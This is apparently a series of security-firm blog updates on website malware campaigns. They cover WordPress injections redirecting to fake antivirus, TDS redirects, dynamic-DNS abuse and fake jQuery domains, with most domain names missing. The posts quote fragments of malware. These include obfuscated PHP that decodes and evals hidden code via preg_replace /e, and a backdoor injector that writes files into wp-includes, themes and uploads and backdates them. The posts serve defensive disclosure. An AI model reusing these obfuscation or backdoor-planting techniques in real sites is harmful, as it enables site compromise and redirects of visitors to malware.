Continuing injections from *

I don\'t think we have logged about it lately, but an old infection (that started early this year)is still going strong. The result is this code being injected to the site when visited bycertain browsers:

var j=0; while(j<230) 
.charCodeAt( j++)-1));

And the hidden code that generates it is tricky to find and generlly hidden inside one of the themefiles or wp-includes (on WordPress sites). It looks like this:

function check_image_c()
        $imagepath = array (
  0 => "47 118 97 114 47 119 119 119 47 116 104 111 117 103 104 116 102 117 108 119 111 109 101 110 46',
  1 => "111 114 103 47 119 112 45 99 111 110 116 101 110 116 47 117 112 108 111 97 100 115 47 50 48',
  2 => "49 51 47 48 51 47 117 112 97 110 100 117 112 46 106 112 103',
        $image = "101 118 97 108 40 98 97 115 101 54 52 95 100 101 99 111 100 101 40 39";
        $image = implode("", array_map("chr", explode(" ", $image)));
        $a = 'pre" . 'g_replace';
        $a("/.*/e", $image . $code . "'));", "");
                return false;

All that to the end goal: Inject an iframe from * (and other free domains) that will redirect the browser of the victim to Fake AV.

Backdoor Injector code

A backdoor injector code we found on a compromised site:

        file_put_contentz($dir.'/wp-includes/page.php', get_contentz(''));
        touch($dir.'/wp-includes/page.php', $time);

        file_put_contentz($dir.'/wp-content/themes/'.get_settings('template').'/timthumb.php', get_contentz(''));
        touch($dir.'/wp-content/themes/'.get_settings('template').'/timthumb.php', $time);

        file_put_contentz($dir.'/wp-admin/options-plugin.php', get_contentz(''));
        touch($dir.'/wp-admin/options-plugin.php', $time);

        file_put_contentz($dir.'/wp-plugin.php', get_contentz(''));
        touch($dir.'/wp-plugin.php', $time);

        file_put_contentz($dir.'/wp-content/themes/theme.php', get_contentz(''));
        touch($dir.'/wp-content/themes/theme.php', $time);

        file_put_contentz($dir.'/wp-content/uploads/timthumb.php', get_contentz(''));
        touch($dir.'/wp-content/uploads/timthumb.php', $time);

It looks for a writable directly either inside wp-includes, wp-content or inside uploads to inject a backdoor.

Large scale TDS redirections

Lots of compromised sites redirecting to TDS:

And that's just a small sample. We have detected just in February over 500 sites compromised exactly like that.

ChangeIP (dynamic DNS) malware

If you look at the top domains distributing malware for the last days (and months), whatdo you see in common?

#numberofsitesinfected #type #malwaredomain
650 iframe
315 iframe
275 iframe
179 iframe
159 iframe
148 iframe
146 iframe
126 iframe
116 iframe
101 iframe
93  iframe
84  iframe
77  iframe
74  iframe
73  iframe
72  iframe

Most of them are using a (dynamic DNS) sub domain as the first level of injection. Just check,,,, etc, etc. They are all part of: Just in the last 60 days, weidentified more than 15,000 different sub domains from them being used to distribute malware.

Don\'t get us wrong, Dynamic DNS is a very useful service, but we would love if they would implement more serious filtering/blacklistingand some type of captcha to prevent their service from being abused by criminals.

However, in the current state, we can only recommend against using their service to avoid being thrown in the mix with thethousands of malicious domains that they host.

*If you look past 6 months ago, was the main domain distributing malware, but since it was shut down, the attackers have migrated to Hopefully they will do something about it.

More Fake jQuery sites –

We keep seeing fake jQuery sites popping up and being used to distributemalware. One was, other was and the new oneis (

And this new one seems to be affecting many web sites in the last few days. All of them have the following on their header or index.php files: = "httx://"

Which redirects any visitor to the web site to where it is then sent to other random spammy domains (seems like a TDS is in place).

Update:We are also seeing some sites with this javascript file being included:, which just redirects back to via the same in javascript.

*Note that the domain was just registered (20-nov-2012), so it is not being flagged anywhere.
**The official jquery sites are or Other variations are likely fake. seems to be gone

It seems that the (sub TLD) that used to be mass used byspammers and malware is now gone.Their registration page is offline:

$ host
Host not found: 3(NXDOMAIN)

$ host
Host not found: 3(NXDOMAIN)

And we hope it stays that way.